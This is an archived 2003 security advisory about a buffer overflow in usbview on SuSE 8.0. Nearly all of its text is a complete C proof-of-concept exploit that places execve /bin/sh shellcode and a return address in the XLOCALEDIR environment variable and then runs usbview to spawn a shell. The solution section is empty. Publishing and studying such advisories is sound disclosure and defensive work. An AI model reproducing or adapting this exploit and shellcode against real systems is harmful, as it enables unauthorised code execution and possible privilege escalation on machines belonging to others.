6th Apr 2003 [SBWID-6115]
COMMAND
Usbview exploit
SYSTEMS AFFECTED
Usbview on SuSE 8.0 (at least)
PROBLEM
Thanks to Serkan Akpolat [[email protected]] post :
+-------------------------------
/* Proof of Concept Code for buffer overflow vulnerability in usbview
-----------------------*/
/* usbview uses xf86 libs, which have unsafe strcopy , as it's explained in
oC-localX.c - -*/
/* Long string in XLOCALEDIR env variable causes segmentation
fault------------------------*/
/* Usbview ,which comes with SuSE 8.0 isn't by default setuid root
-----------------------*/
/* This code has been tested in SuSE 8.0
------------------------------------------------*/
/* It spawns a shell with the uid of the user, who runs the
expolit---------------------*/
/* Greetings to Avicenna , Hackpimp , Murat Balaban , core.gen.tr
team.----------------*/
/* Rooting Sabotage Forced, turevleri ve ayakci takimina: Basit
bilginizle------------*/
/* insanlari kandirmaya calisarak bi yere ulasamazsiniz.(Siz ing.
anlayamadiginiz ---*/
/* icin turkce
yazdim.)-------------------------------------------------------------*/
/* Written by Serkan Akpolat For Fun [email protected]
-----------------------------*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#define BUFSIZE 6000
#define PATH "/usr/bin/usbview"
#define PROGNAME "usbview"
const char shellcode[] =
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/bin/sh";
/* execve /bin/sh */
/* Shellcode from "Buffer Overflow" paper of Murat Balaban */
int main(void)
{
char *envv=NULL;
char buf[BUFSIZE];
int i,j,ret;
int *ap;
ap = (int *)(buf);
ret = 0xbfffe86f;
printf("Shellcode is on 0x%08x , Press Enter For a Shell\n",ret);
for (i = 0; i < BUFSIZE -4; i += 4)
*ap++ = ret;
memcpy(buf + 4, shellcode, strlen(shellcode));
setenv("XLOCALEDIR", buf, 1);
getchar();
execl(PATH,PROGNAME,NULL);
}
SOLUTION
?